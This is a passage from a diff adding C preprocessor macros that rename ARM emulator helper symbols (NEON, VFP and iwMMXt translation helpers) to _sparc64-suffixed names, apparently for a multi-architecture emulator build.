gen_helper_iwmmxt_srlw_sparc64 +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_sparc64 +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_sparc64 +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_sparc64 +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_sparc64 +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_sparc64 +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_sparc64 +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_sparc64 +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_sparc64 +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_sparc64 +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_sparc64 +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_sparc64 +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_sparc64 +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_sparc64 +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_sparc64 +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_sparc64 +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_sparc64 +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_sparc64 +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_sparc64 +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_sparc64 +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_sparc64 +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_sparc64 +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_sparc64 +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_sparc64 +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_sparc64 +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_sparc64 +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_sparc64 +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_sparc64 +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_sparc64 +#define 
gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_sparc64 +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_sparc64 +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_sparc64 +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_sparc64 +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_sparc64 +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_sparc64 +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_sparc64 +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_sparc64 +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_sparc64 +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_sparc64 +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_sparc64 +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_sparc64 +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_sparc64 +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_sparc64 +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_sparc64 +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_sparc64 +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_sparc64 +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_sparc64 +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_sparc64 +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_sparc64 +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_sparc64 +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_sparc64 +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_sparc64 +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_sparc64 +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_sparc64 +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_sparc64 +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_sparc64 +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_sparc64 +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_sparc64 +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_sparc64 +#define 
gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_sparc64 +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_sparc64 +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_sparc64 +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_sparc64 +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_sparc64 +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_sparc64 +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_sparc64 +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_sparc64 +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_sparc64 +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_sparc64 +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_sparc64 +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_sparc64 +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_sparc64 +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_sparc64 +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_sparc64 +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_sparc64 +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_sparc64 +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_sparc64 +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_sparc64 +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_sparc64 +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_sparc64 +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_sparc64 +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_sparc64 +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_sparc64 +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_sparc64 +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_sparc64 +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_sparc64 +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_sparc64 +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_sparc64 +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_sparc64 +#define 
gen_helper_neon_max_s16 gen_helper_neon_max_s16_sparc64 +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_sparc64 +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_sparc64 +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_sparc64 +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_sparc64 +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_sparc64 +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_sparc64 +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_sparc64 +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_sparc64 +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_sparc64 +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_sparc64 +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_sparc64 +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_sparc64 +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_sparc64 +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_sparc64 +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_sparc64 +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_sparc64 +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_sparc64 +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_sparc64 +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_sparc64 +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_sparc64 +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_sparc64 +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_sparc64 +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_sparc64 +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_sparc64 +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_sparc64 +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_sparc64 +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_sparc64 +#define gen_helper_neon_narrow_sat_u32 
gen_helper_neon_narrow_sat_u32_sparc64 +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_sparc64 +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_sparc64 +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_sparc64 +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_sparc64 +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_sparc64 +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_sparc64 +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_sparc64 +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_sparc64 +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_sparc64 +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_sparc64 +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_sparc64 +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_sparc64 +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_sparc64 +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_sparc64 +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_sparc64 +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_sparc64 +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_sparc64 +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_sparc64 +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_sparc64 +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_sparc64 +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_sparc64 +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_sparc64 +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_sparc64 +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_sparc64 +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_sparc64 +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_sparc64 +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_sparc64 +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_sparc64 +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_sparc64 
+#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_sparc64 +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_sparc64 +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_sparc64 +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_sparc64 +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_sparc64 +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_sparc64 +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_sparc64 +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_sparc64 +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_sparc64 +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_sparc64 +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_sparc64 +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_sparc64 +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_sparc64 +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_sparc64 +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_sparc64 +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_sparc64 +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_sparc64 +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_sparc64 +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_sparc64 +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_sparc64 +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_sparc64 +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_sparc64 +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_sparc64 +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_sparc64 +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_sparc64 +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_sparc64 +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_sparc64 +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_sparc64 +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_sparc64 +#define 
gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_sparc64 +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_sparc64 +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_sparc64 +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_sparc64 +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_sparc64 +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_sparc64 +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_sparc64 +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_sparc64 +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_sparc64 +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_sparc64 +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_sparc64 +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_sparc64 +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_sparc64 +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_sparc64 +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_sparc64 +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_sparc64 +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_sparc64 +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_sparc64 +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_sparc64 +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_sparc64 +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_sparc64 +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_sparc64 +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_sparc64 +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_sparc64 +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_sparc64 +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_sparc64 +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_sparc64 +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_sparc64 +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_sparc64 +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_sparc64 +#define 
gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_sparc64 +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_sparc64 +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_sparc64 +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_sparc64 +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_sparc64 +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_sparc64 +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_sparc64 +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_sparc64 +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_sparc64 +#define gen_helper_neon_tbl gen_helper_neon_tbl_sparc64 +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_sparc64 +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_sparc64 +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_sparc64 +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_sparc64 +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_sparc64 +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_sparc64 +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_sparc64 +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_sparc64 +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_sparc64 +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_sparc64 +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_sparc64 +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_sparc64 +#define gen_helper_neon_zip16 gen_helper_neon_zip16_sparc64 +#define gen_helper_neon_zip8 gen_helper_neon_zip8_sparc64 +#define gen_helper_pre_hvc gen_helper_pre_hvc_sparc64 +#define gen_helper_pre_smc gen_helper_pre_smc_sparc64 +#define gen_helper_qadd16 gen_helper_qadd16_sparc64 +#define gen_helper_qadd8 gen_helper_qadd8_sparc64 +#define gen_helper_qaddsubx gen_helper_qaddsubx_sparc64 +#define gen_helper_qsub16 gen_helper_qsub16_sparc64 +#define gen_helper_qsub8 gen_helper_qsub8_sparc64 +#define gen_helper_qsubaddx 
gen_helper_qsubaddx_sparc64 +#define gen_helper_rbit gen_helper_rbit_sparc64 +#define gen_helper_recpe_f32 gen_helper_recpe_f32_sparc64 +#define gen_helper_recpe_u32 gen_helper_recpe_u32_sparc64 +#define gen_helper_recps_f32 gen_helper_recps_f32_sparc64 +#define gen_helper_rintd gen_helper_rintd_sparc64 +#define gen_helper_rintd_exact gen_helper_rintd_exact_sparc64 +#define gen_helper_rints gen_helper_rints_sparc64 +#define gen_helper_rints_exact gen_helper_rints_exact_sparc64 +#define gen_helper_ror_cc gen_helper_ror_cc_sparc64 +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_sparc64 +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_sparc64 +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_sparc64 +#define gen_helper_sadd16 gen_helper_sadd16_sparc64 +#define gen_helper_sadd8 gen_helper_sadd8_sparc64 +#define gen_helper_saddsubx gen_helper_saddsubx_sparc64 +#define gen_helper_sar_cc gen_helper_sar_cc_sparc64 +#define gen_helper_sdiv gen_helper_sdiv_sparc64 +#define gen_helper_sel_flags gen_helper_sel_flags_sparc64 +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_sparc64 +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_sparc64 +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_sparc64 +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_sparc64 +#define gen_helper_set_rmode gen_helper_set_rmode_sparc64 +#define gen_helper_set_user_reg gen_helper_set_user_reg_sparc64 +#define gen_helper_shadd16 gen_helper_shadd16_sparc64 +#define gen_helper_shadd8 gen_helper_shadd8_sparc64 +#define gen_helper_shaddsubx gen_helper_shaddsubx_sparc64 +#define gen_helper_shl_cc gen_helper_shl_cc_sparc64 +#define gen_helper_shr_cc gen_helper_shr_cc_sparc64 +#define gen_helper_shsub16 gen_helper_shsub16_sparc64 +#define gen_helper_shsub8 gen_helper_shsub8_sparc64 +#define gen_helper_shsubaddx gen_helper_shsubaddx_sparc64 +#define gen_helper_ssat gen_helper_ssat_sparc64 +#define gen_helper_ssat16 gen_helper_ssat16_sparc64 +#define gen_helper_ssub16 
gen_helper_ssub16_sparc64 +#define gen_helper_ssub8 gen_helper_ssub8_sparc64 +#define gen_helper_ssubaddx gen_helper_ssubaddx_sparc64 +#define gen_helper_sub_saturate gen_helper_sub_saturate_sparc64 +#define gen_helper_sxtb16 gen_helper_sxtb16_sparc64 +#define gen_helper_uadd16 gen_helper_uadd16_sparc64 +#define gen_helper_uadd8 gen_helper_uadd8_sparc64 +#define gen_helper_uaddsubx gen_helper_uaddsubx_sparc64 +#define gen_helper_udiv gen_helper_udiv_sparc64 +#define gen_helper_uhadd16 gen_helper_uhadd16_sparc64 +#define gen_helper_uhadd8 gen_helper_uhadd8_sparc64 +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_sparc64 +#define gen_helper_uhsub16 gen_helper_uhsub16_sparc64 +#define gen_helper_uhsub8 gen_helper_uhsub8_sparc64 +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_sparc64 +#define gen_helper_uqadd16 gen_helper_uqadd16_sparc64 +#define gen_helper_uqadd8 gen_helper_uqadd8_sparc64 +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_sparc64 +#define gen_helper_uqsub16 gen_helper_uqsub16_sparc64 +#define gen_helper_uqsub8 gen_helper_uqsub8_sparc64 +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_sparc64 +#define gen_helper_usad8 gen_helper_usad8_sparc64 +#define gen_helper_usat gen_helper_usat_sparc64 +#define gen_helper_usat16 gen_helper_usat16_sparc64 +#define gen_helper_usub16 gen_helper_usub16_sparc64 +#define gen_helper_usub8 gen_helper_usub8_sparc64 +#define gen_helper_usubaddx gen_helper_usubaddx_sparc64 +#define gen_helper_uxtb16 gen_helper_uxtb16_sparc64 +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_sparc64 +#define gen_helper_v7m_msr gen_helper_v7m_msr_sparc64 +#define gen_helper_vfp_absd gen_helper_vfp_absd_sparc64 +#define gen_helper_vfp_abss gen_helper_vfp_abss_sparc64 +#define gen_helper_vfp_addd gen_helper_vfp_addd_sparc64 +#define gen_helper_vfp_adds gen_helper_vfp_adds_sparc64 +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_sparc64 +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_sparc64 +#define gen_helper_vfp_cmpes 
gen_helper_vfp_cmpes_sparc64 +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_sparc64 +#define gen_helper_vfp_divd gen_helper_vfp_divd_sparc64 +#define gen_helper_vfp_divs gen_helper_vfp_divs_sparc64 +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_sparc64 +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_sparc64 +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_sparc64 +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_sparc64 +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_sparc64 +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_sparc64 +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_sparc64 +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_sparc64 +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_sparc64 +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_sparc64 +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_sparc64 +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_sparc64 +#define gen_helper_vfp_mins gen_helper_vfp_mins_sparc64 +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_sparc64 +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_sparc64 +#define gen_helper_vfp_muld gen_helper_vfp_muld_sparc64 +#define gen_helper_vfp_muls gen_helper_vfp_muls_sparc64 +#define gen_helper_vfp_negd gen_helper_vfp_negd_sparc64 +#define gen_helper_vfp_negs gen_helper_vfp_negs_sparc64 +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_sparc64 +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_sparc64 +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_sparc64 +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_sparc64 +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_sparc64 +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_sparc64 +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_sparc64 +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_sparc64 +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_sparc64 +#define gen_helper_vfp_subd 
gen_helper_vfp_subd_sparc64 +#define gen_helper_vfp_subs gen_helper_vfp_subs_sparc64 +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_sparc64 +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_sparc64 +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_sparc64 +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_sparc64 +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_sparc64 +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_sparc64 +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_sparc64 +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_sparc64 +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_sparc64 +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_sparc64 +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_sparc64 +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_sparc64 +#define gen_helper_vfp_touid gen_helper_vfp_touid_sparc64 +#define gen_helper_vfp_touis gen_helper_vfp_touis_sparc64 +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_sparc64 +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_sparc64 +#define gen_helper_vfp_tould gen_helper_vfp_tould_sparc64 +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_sparc64 +#define gen_helper_vfp_touls gen_helper_vfp_touls_sparc64 +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_sparc64 +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_sparc64 +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_sparc64 +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_sparc64 +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_sparc64 +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_sparc64 +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_sparc64 +#define gen_helper_wfe gen_helper_wfe_sparc64 +#define gen_helper_wfi gen_helper_wfi_sparc64 +#define gen_hvc gen_hvc_sparc64 +#define 
gen_intermediate_code_internal gen_intermediate_code_internal_sparc64 +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_sparc64 +#define gen_iwmmxt_address gen_iwmmxt_address_sparc64 +#define gen_iwmmxt_shift gen_iwmmxt_shift_sparc64 +#define gen_jmp gen_jmp_sparc64 +#define gen_load_and_replicate gen_load_and_replicate_sparc64 +#define gen_load_exclusive gen_load_exclusive_sparc64 +#define gen_logic_CC gen_logic_CC_sparc64 +#define gen_logicq_cc gen_logicq_cc_sparc64 +#define gen_lookup_tb gen_lookup_tb_sparc64 +#define gen_mov_F0_vreg gen_mov_F0_vreg_sparc64 +#define gen_mov_F1_vreg gen_mov_F1_vreg_sparc64 +#define gen_mov_vreg_F0 gen_mov_vreg_F0_sparc64 +#define gen_muls_i64_i32 gen_muls_i64_i32_sparc64 +#define gen_mulu_i64_i32 gen_mulu_i64_i32_sparc64 +#define gen_mulxy gen_mulxy_sparc64 +#define gen_neon_add gen_neon_add_sparc64 +#define gen_neon_addl gen_neon_addl_sparc64 +#define gen_neon_addl_saturate gen_neon_addl_saturate_sparc64 +#define gen_neon_bsl gen_neon_bsl_sparc64 +#define gen_neon_dup_high16 gen_neon_dup_high16_sparc64 +#define gen_neon_dup_low16 gen_neon_dup_low16_sparc64 +#define gen_neon_dup_u8 gen_neon_dup_u8_sparc64 +#define gen_neon_mull gen_neon_mull_sparc64 +#define gen_neon_narrow gen_neon_narrow_sparc64 +#define gen_neon_narrow_op gen_neon_narrow_op_sparc64 +#define gen_neon_narrow_sats gen_neon_narrow_sats_sparc64 +#define gen_neon_narrow_satu gen_neon_narrow_satu_sparc64 +#define gen_neon_negl gen_neon_negl_sparc64 +#define 